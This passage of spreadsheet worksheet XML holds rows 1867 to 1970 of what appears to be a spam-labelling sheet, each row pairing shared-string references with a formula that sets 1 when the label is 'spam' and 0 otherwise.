    <row r="1867" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1867" t="s">
        <v>7099</v>
      </c>
      <c r="B1867" t="s">
        <v>5294</v>
      </c>
      <c r="C1867" s="1">
        <f>IF(B1867="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1868" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1868" t="s">
        <v>7100</v>
      </c>
      <c r="B1868" t="s">
        <v>5294</v>
      </c>
      <c r="C1868" s="1">
        <f>IF(B1868="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1869" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1869" t="s">
        <v>7101</v>
      </c>
      <c r="B1869" t="s">
        <v>5294</v>
      </c>
      <c r="C1869" s="1">
        <f>IF(B1869="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1870" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1870" t="s">
        <v>7102</v>
      </c>
      <c r="B1870" t="s">
        <v>5294</v>
      </c>
      <c r="C1870" s="1">
        <f>IF(B1870="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1871" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1871" t="s">
        <v>7103</v>
      </c>
      <c r="B1871" t="s">
        <v>5294</v>
      </c>
      <c r="C1871" s="1">
        <f>IF(B1871="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1872" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1872" t="s">
        <v>7104</v>
      </c>
      <c r="B1872" t="s">
        <v>5294</v>
      </c>
      <c r="C1872" s="1">
        <f>IF(B1872="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1873" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1873" t="s">
        <v>7105</v>
      </c>
      <c r="B1873" t="s">
        <v>5294</v>
      </c>
      <c r="C1873" s="1">
        <f>IF(B1873="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1874" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1874" t="s">
        <v>7106</v>
      </c>
      <c r="B1874" t="s">
        <v>5294</v>
      </c>
      <c r="C1874" s="1">
        <f>IF(B1874="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1875" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1875" t="s">
        <v>7107</v>
      </c>
      <c r="B1875" t="s">
        <v>5297</v>
      </c>
      <c r="C1875" s="1">
        <f>IF(B1875="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1876" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1876" t="s">
        <v>7108</v>
      </c>
      <c r="B1876" t="s">
        <v>5297</v>
      </c>
      <c r="C1876" s="1">
        <f>IF(B1876="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1877" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1877" t="s">
        <v>5564</v>
      </c>
      <c r="B1877" t="s">
        <v>5297</v>
      </c>
      <c r="C1877" s="1">
        <f>IF(B1877="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1878" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1878" t="s">
        <v>7010</v>
      </c>
      <c r="B1878" t="s">
        <v>5294</v>
      </c>
      <c r="C1878" s="1">
        <f>IF(B1878="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1879" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1879" t="s">
        <v>7109</v>
      </c>
      <c r="B1879" t="s">
        <v>5294</v>
      </c>
      <c r="C1879" s="1">
        <f>IF(B1879="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1880" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1880" t="s">
        <v>7110</v>
      </c>
      <c r="B1880" t="s">
        <v>5294</v>
      </c>
      <c r="C1880" s="1">
        <f>IF(B1880="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1881" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1881" t="s">
        <v>7111</v>
      </c>
      <c r="B1881" t="s">
        <v>5297</v>
      </c>
      <c r="C1881" s="1">
        <f>IF(B1881="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1882" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1882" t="s">
        <v>7112</v>
      </c>
      <c r="B1882" t="s">
        <v>5294</v>
      </c>
      <c r="C1882" s="1">
        <f>IF(B1882="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1883" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1883" t="s">
        <v>7113</v>
      </c>
      <c r="B1883" t="s">
        <v>5294</v>
      </c>
      <c r="C1883" s="1">
        <f>IF(B1883="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1884" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1884" t="s">
        <v>7114</v>
      </c>
      <c r="B1884" t="s">
        <v>5294</v>
      </c>
      <c r="C1884" s="1">
        <f>IF(B1884="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1885" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1885" t="s">
        <v>7115</v>
      </c>
      <c r="B1885" t="s">
        <v>5294</v>
      </c>
      <c r="C1885" s="1">
        <f>IF(B1885="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1886" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1886" t="s">
        <v>7116</v>
      </c>
      <c r="B1886" t="s">
        <v>5294</v>
      </c>
      <c r="C1886" s="1">
        <f>IF(B1886="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1887" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1887" t="s">
        <v>7117</v>
      </c>
      <c r="B1887" t="s">
        <v>5294</v>
      </c>
      <c r="C1887" s="1">
        <f>IF(B1887="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1888" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1888" t="s">
        <v>7118</v>
      </c>
      <c r="B1888" t="s">
        <v>5297</v>
      </c>
      <c r="C1888" s="1">
        <f>IF(B1888="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1889" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1889" t="s">
        <v>7119</v>
      </c>
      <c r="B1889" t="s">
        <v>5297</v>
      </c>
      <c r="C1889" s="1">
        <f>IF(B1889="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1890" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1890" t="s">
        <v>7120</v>
      </c>
      <c r="B1890" t="s">
        <v>5294</v>
      </c>
      <c r="C1890" s="1">
        <f>IF(B1890="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1891" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1891" t="s">
        <v>7121</v>
      </c>
      <c r="B1891" t="s">
        <v>5294</v>
      </c>
      <c r="C1891" s="1">
        <f>IF(B1891="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1892" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1892" t="s">
        <v>7122</v>
      </c>
      <c r="B1892" t="s">
        <v>5294</v>
      </c>
      <c r="C1892" s="1">
        <f>IF(B1892="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1893" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1893" t="s">
        <v>7123</v>
      </c>
      <c r="B1893" t="s">
        <v>5294</v>
      </c>
      <c r="C1893" s="1">
        <f>IF(B1893="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1894" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1894" t="s">
        <v>7124</v>
      </c>
      <c r="B1894" t="s">
        <v>5297</v>
      </c>
      <c r="C1894" s="1">
        <f>IF(B1894="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1895" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1895" t="s">
        <v>6588</v>
      </c>
      <c r="B1895" t="s">
        <v>5294</v>
      </c>
      <c r="C1895" s="1">
        <f>IF(B1895="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1896" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1896" t="s">
        <v>7125</v>
      </c>
      <c r="B1896" t="s">
        <v>5297</v>
      </c>
      <c r="C1896" s="1">
        <f>IF(B1896="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1897" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1897" t="s">
        <v>7126</v>
      </c>
      <c r="B1897" t="s">
        <v>5294</v>
      </c>
      <c r="C1897" s="1">
        <f>IF(B1897="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1898" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1898" t="s">
        <v>7127</v>
      </c>
      <c r="B1898" t="s">
        <v>5294</v>
      </c>
      <c r="C1898" s="1">
        <f>IF(B1898="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1899" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1899" t="s">
        <v>7128</v>
      </c>
      <c r="B1899" t="s">
        <v>5294</v>
      </c>
      <c r="C1899" s="1">
        <f>IF(B1899="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1900" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1900" t="s">
        <v>7129</v>
      </c>
      <c r="B1900" t="s">
        <v>5294</v>
      </c>
      <c r="C1900" s="1">
        <f>IF(B1900="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1901" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1901" t="s">
        <v>7130</v>
      </c>
      <c r="B1901" t="s">
        <v>5294</v>
      </c>
      <c r="C1901" s="1">
        <f>IF(B1901="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1902" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1902" t="s">
        <v>7131</v>
      </c>
      <c r="B1902" t="s">
        <v>5294</v>
      </c>
      <c r="C1902" s="1">
        <f>IF(B1902="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1903" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1903" t="s">
        <v>5376</v>
      </c>
      <c r="B1903" t="s">
        <v>5294</v>
      </c>
      <c r="C1903" s="1">
        <f>IF(B1903="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1904" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1904" t="s">
        <v>7132</v>
      </c>
      <c r="B1904" t="s">
        <v>5294</v>
      </c>
      <c r="C1904" s="1">
        <f>IF(B1904="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1905" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1905" t="s">
        <v>7133</v>
      </c>
      <c r="B1905" t="s">
        <v>5297</v>
      </c>
      <c r="C1905" s="1">
        <f>IF(B1905="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1906" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1906" t="s">
        <v>7134</v>
      </c>
      <c r="B1906" t="s">
        <v>5294</v>
      </c>
      <c r="C1906" s="1">
        <f>IF(B1906="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1907" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1907" t="s">
        <v>7135</v>
      </c>
      <c r="B1907" t="s">
        <v>5294</v>
      </c>
      <c r="C1907" s="1">
        <f>IF(B1907="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1908" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1908" t="s">
        <v>7136</v>
      </c>
      <c r="B1908" t="s">
        <v>5294</v>
      </c>
      <c r="C1908" s="1">
        <f>IF(B1908="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1909" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1909" t="s">
        <v>7137</v>
      </c>
      <c r="B1909" t="s">
        <v>5294</v>
      </c>
      <c r="C1909" s="1">
        <f>IF(B1909="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1910" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1910" t="s">
        <v>7138</v>
      </c>
      <c r="B1910" t="s">
        <v>5294</v>
      </c>
      <c r="C1910" s="1">
        <f>IF(B1910="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1911" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1911" t="s">
        <v>7139</v>
      </c>
      <c r="B1911" t="s">
        <v>5294</v>
      </c>
      <c r="C1911" s="1">
        <f>IF(B1911="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1912" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1912" t="s">
        <v>7140</v>
      </c>
      <c r="B1912" t="s">
        <v>5294</v>
      </c>
      <c r="C1912" s="1">
        <f>IF(B1912="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1913" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1913" t="s">
        <v>7141</v>
      </c>
      <c r="B1913" t="s">
        <v>5294</v>
      </c>
      <c r="C1913" s="1">
        <f>IF(B1913="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1914" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1914" t="s">
        <v>7142</v>
      </c>
      <c r="B1914" t="s">
        <v>5294</v>
      </c>
      <c r="C1914" s="1">
        <f>IF(B1914="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1915" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1915" t="s">
        <v>7143</v>
      </c>
      <c r="B1915" t="s">
        <v>5294</v>
      </c>
      <c r="C1915" s="1">
        <f>IF(B1915="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1916" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1916" t="s">
        <v>7144</v>
      </c>
      <c r="B1916" t="s">
        <v>5297</v>
      </c>
      <c r="C1916" s="1">
        <f>IF(B1916="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1917" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1917" t="s">
        <v>7145</v>
      </c>
      <c r="B1917" t="s">
        <v>5294</v>
      </c>
      <c r="C1917" s="1">
        <f>IF(B1917="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1918" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1918" t="s">
        <v>7146</v>
      </c>
      <c r="B1918" t="s">
        <v>5294</v>
      </c>
      <c r="C1918" s="1">
        <f>IF(B1918="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1919" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1919" t="s">
        <v>7147</v>
      </c>
      <c r="B1919" t="s">
        <v>5294</v>
      </c>
      <c r="C1919" s="1">
        <f>IF(B1919="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1920" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1920" t="s">
        <v>7148</v>
      </c>
      <c r="B1920" t="s">
        <v>5294</v>
      </c>
      <c r="C1920" s="1">
        <f>IF(B1920="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1921" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1921" t="s">
        <v>7149</v>
      </c>
      <c r="B1921" t="s">
        <v>5294</v>
      </c>
      <c r="C1921" s="1">
        <f>IF(B1921="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1922" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1922" t="s">
        <v>7150</v>
      </c>
      <c r="B1922" t="s">
        <v>5294</v>
      </c>
      <c r="C1922" s="1">
        <f>IF(B1922="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1923" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1923" t="s">
        <v>7151</v>
      </c>
      <c r="B1923" t="s">
        <v>5294</v>
      </c>
      <c r="C1923" s="1">
        <f>IF(B1923="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1924" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1924" t="s">
        <v>7152</v>
      </c>
      <c r="B1924" t="s">
        <v>5294</v>
      </c>
      <c r="C1924" s="1">
        <f>IF(B1924="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1925" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1925" t="s">
        <v>7153</v>
      </c>
      <c r="B1925" t="s">
        <v>5294</v>
      </c>
      <c r="C1925" s="1">
        <f>IF(B1925="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1926" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1926" t="s">
        <v>7154</v>
      </c>
      <c r="B1926" t="s">
        <v>5294</v>
      </c>
      <c r="C1926" s="1">
        <f>IF(B1926="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1927" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1927" t="s">
        <v>7155</v>
      </c>
      <c r="B1927" t="s">
        <v>5294</v>
      </c>
      <c r="C1927" s="1">
        <f>IF(B1927="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1928" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1928" t="s">
        <v>7156</v>
      </c>
      <c r="B1928" t="s">
        <v>5294</v>
      </c>
      <c r="C1928" s="1">
        <f>IF(B1928="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1929" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1929" t="s">
        <v>7157</v>
      </c>
      <c r="B1929" t="s">
        <v>5294</v>
      </c>
      <c r="C1929" s="1">
        <f>IF(B1929="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1930" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1930" t="s">
        <v>7158</v>
      </c>
      <c r="B1930" t="s">
        <v>5297</v>
      </c>
      <c r="C1930" s="1">
        <f>IF(B1930="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1931" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1931" t="s">
        <v>7159</v>
      </c>
      <c r="B1931" t="s">
        <v>5297</v>
      </c>
      <c r="C1931" s="1">
        <f>IF(B1931="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1932" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1932" t="s">
        <v>7160</v>
      </c>
      <c r="B1932" t="s">
        <v>5294</v>
      </c>
      <c r="C1932" s="1">
        <f>IF(B1932="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1933" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1933" t="s">
        <v>7161</v>
      </c>
      <c r="B1933" t="s">
        <v>5294</v>
      </c>
      <c r="C1933" s="1">
        <f>IF(B1933="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1934" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1934" t="s">
        <v>7162</v>
      </c>
      <c r="B1934" t="s">
        <v>5294</v>
      </c>
      <c r="C1934" s="1">
        <f>IF(B1934="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1935" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1935" t="s">
        <v>7163</v>
      </c>
      <c r="B1935" t="s">
        <v>5294</v>
      </c>
      <c r="C1935" s="1">
        <f>IF(B1935="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1936" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1936" t="s">
        <v>7164</v>
      </c>
      <c r="B1936" t="s">
        <v>5294</v>
      </c>
      <c r="C1936" s="1">
        <f>IF(B1936="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1937" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1937" t="s">
        <v>7165</v>
      </c>
      <c r="B1937" t="s">
        <v>5294</v>
      </c>
      <c r="C1937" s="1">
        <f>IF(B1937="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1938" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1938" t="s">
        <v>7166</v>
      </c>
      <c r="B1938" t="s">
        <v>5294</v>
      </c>
      <c r="C1938" s="1">
        <f>IF(B1938="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1939" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1939" t="s">
        <v>7167</v>
      </c>
      <c r="B1939" t="s">
        <v>5294</v>
      </c>
      <c r="C1939" s="1">
        <f>IF(B1939="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1940" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1940" t="s">
        <v>7168</v>
      </c>
      <c r="B1940" t="s">
        <v>5294</v>
      </c>
      <c r="C1940" s="1">
        <f>IF(B1940="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1941" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1941" t="s">
        <v>7169</v>
      </c>
      <c r="B1941" t="s">
        <v>5297</v>
      </c>
      <c r="C1941" s="1">
        <f>IF(B1941="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1942" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1942" t="s">
        <v>7170</v>
      </c>
      <c r="B1942" t="s">
        <v>5294</v>
      </c>
      <c r="C1942" s="1">
        <f>IF(B1942="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1943" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1943" t="s">
        <v>7171</v>
      </c>
      <c r="B1943" t="s">
        <v>5297</v>
      </c>
      <c r="C1943" s="1">
        <f>IF(B1943="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1944" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1944" t="s">
        <v>7172</v>
      </c>
      <c r="B1944" t="s">
        <v>5294</v>
      </c>
      <c r="C1944" s="1">
        <f>IF(B1944="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1945" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1945" t="s">
        <v>7173</v>
      </c>
      <c r="B1945" t="s">
        <v>5294</v>
      </c>
      <c r="C1945" s="1">
        <f>IF(B1945="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1946" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1946" t="s">
        <v>7174</v>
      </c>
      <c r="B1946" t="s">
        <v>5294</v>
      </c>
      <c r="C1946" s="1">
        <f>IF(B1946="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1947" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1947" t="s">
        <v>7175</v>
      </c>
      <c r="B1947" t="s">
        <v>5294</v>
      </c>
      <c r="C1947" s="1">
        <f>IF(B1947="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1948" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1948" t="s">
        <v>7176</v>
      </c>
      <c r="B1948" t="s">
        <v>5294</v>
      </c>
      <c r="C1948" s="1">
        <f>IF(B1948="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1949" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1949" t="s">
        <v>7177</v>
      </c>
      <c r="B1949" t="s">
        <v>5294</v>
      </c>
      <c r="C1949" s="1">
        <f>IF(B1949="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1950" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1950" t="s">
        <v>5590</v>
      </c>
      <c r="B1950" t="s">
        <v>5294</v>
      </c>
      <c r="C1950" s="1">
        <f>IF(B1950="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1951" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1951" t="s">
        <v>7178</v>
      </c>
      <c r="B1951" t="s">
        <v>5294</v>
      </c>
      <c r="C1951" s="1">
        <f>IF(B1951="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1952" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1952" t="s">
        <v>7179</v>
      </c>
      <c r="B1952" t="s">
        <v>5294</v>
      </c>
      <c r="C1952" s="1">
        <f>IF(B1952="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1953" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1953" t="s">
        <v>7180</v>
      </c>
      <c r="B1953" t="s">
        <v>5294</v>
      </c>
      <c r="C1953" s="1">
        <f>IF(B1953="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1954" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1954" t="s">
        <v>7181</v>
      </c>
      <c r="B1954" t="s">
        <v>5294</v>
      </c>
      <c r="C1954" s="1">
        <f>IF(B1954="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1955" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1955" t="s">
        <v>7182</v>
      </c>
      <c r="B1955" t="s">
        <v>5294</v>
      </c>
      <c r="C1955" s="1">
        <f>IF(B1955="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1956" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1956" t="s">
        <v>7183</v>
      </c>
      <c r="B1956" t="s">
        <v>5294</v>
      </c>
      <c r="C1956" s="1">
        <f>IF(B1956="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1957" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1957" t="s">
        <v>7184</v>
      </c>
      <c r="B1957" t="s">
        <v>5294</v>
      </c>
      <c r="C1957" s="1">
        <f>IF(B1957="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1958" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1958" t="s">
        <v>7172</v>
      </c>
      <c r="B1958" t="s">
        <v>5294</v>
      </c>
      <c r="C1958" s="1">
        <f>IF(B1958="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1959" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1959" t="s">
        <v>7185</v>
      </c>
      <c r="B1959" t="s">
        <v>5294</v>
      </c>
      <c r="C1959" s="1">
        <f>IF(B1959="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1960" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1960" t="s">
        <v>7186</v>
      </c>
      <c r="B1960" t="s">
        <v>5294</v>
      </c>
      <c r="C1960" s="1">
        <f>IF(B1960="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1961" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1961" t="s">
        <v>7187</v>
      </c>
      <c r="B1961" t="s">
        <v>5294</v>
      </c>
      <c r="C1961" s="1">
        <f>IF(B1961="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1962" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1962" t="s">
        <v>7188</v>
      </c>
      <c r="B1962" t="s">
        <v>5297</v>
      </c>
      <c r="C1962" s="1">
        <f>IF(B1962="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1963" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1963" t="s">
        <v>7189</v>
      </c>
      <c r="B1963" t="s">
        <v>5294</v>
      </c>
      <c r="C1963" s="1">
        <f>IF(B1963="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1964" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1964" t="s">
        <v>7190</v>
      </c>
      <c r="B1964" t="s">
        <v>5297</v>
      </c>
      <c r="C1964" s="1">
        <f>IF(B1964="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1965" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1965" t="s">
        <v>5463</v>
      </c>
      <c r="B1965" t="s">
        <v>5294</v>
      </c>
      <c r="C1965" s="1">
        <f>IF(B1965="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1966" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1966" t="s">
        <v>7191</v>
      </c>
      <c r="B1966" t="s">
        <v>5294</v>
      </c>
      <c r="C1966" s="1">
        <f>IF(B1966="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1967" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1967" t="s">
        <v>7192</v>
      </c>
      <c r="B1967" t="s">
        <v>5294</v>
      </c>
      <c r="C1967" s="1">
        <f>IF(B1967="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1968" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1968" t="s">
        <v>7193</v>
      </c>
      <c r="B1968" t="s">
        <v>5294</v>
      </c>
      <c r="C1968" s="1">
        <f>IF(B1968="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1969" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1969" t="s">
        <v>7194</v>
      </c>
      <c r="B1969" t="s">
        <v>5294</v>
      </c>
      <c r="C1969" s="1">
        <f>IF(B1969="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1970" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1970" t="s">
        <v>7195</v>
      </c>
      <c r="B1970" t="s">
        <v>5294</v>
      </c>
      <c r="C1970" s="1">
        <f>IF(B1970="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
